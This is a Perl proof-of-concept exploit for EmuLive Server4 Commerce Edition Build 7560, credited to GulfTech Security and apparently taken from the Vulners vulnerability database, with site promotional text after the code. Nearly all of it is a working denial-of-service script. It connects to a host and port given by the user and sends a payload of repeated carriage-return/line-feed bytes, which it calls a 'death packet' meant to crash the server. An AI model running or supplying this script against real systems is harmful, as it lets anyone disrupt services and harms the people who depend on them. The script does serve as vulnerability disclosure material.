#!/usr/bin/perl
##############################################
# EmuLive Server4 Commerce Edition Build 7560
##############################################
# Remote crash proof of conecpt code. When the
# machine running Server4 recieves a malformed
# request on TCP port 66 it crashes very hard!
##############################################
# GulfTech Security http://www.gulftech.org
##############################################
use IO::Socket;
unless ($ARGV[0])
{
die "usage: s4nomore.pl host port"
}
printf("==========================================================\n",);
printf(" EmuLive Server4 Commerce Edition Build 7560 Remote Crash \n",);
printf("==========================================================\n",);
my $host = $ARGV[0];
my $port = $ARGV[1];
my $dead = "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A"; #\r\n\r\n\r\n\r\n
my $i = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Timeout => '100',
Type => SOCK_STREAM,
) || die("Connect Error");
printf("[*] Sending Death Packet To %s\n", $host);
print $i $dead;
$i->autoflush(1);
printf("[*] Host %s Should Now Be Dead\n", $host);
printf("[*] Closing Connections And Exiting \n");
close $i;
exit;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation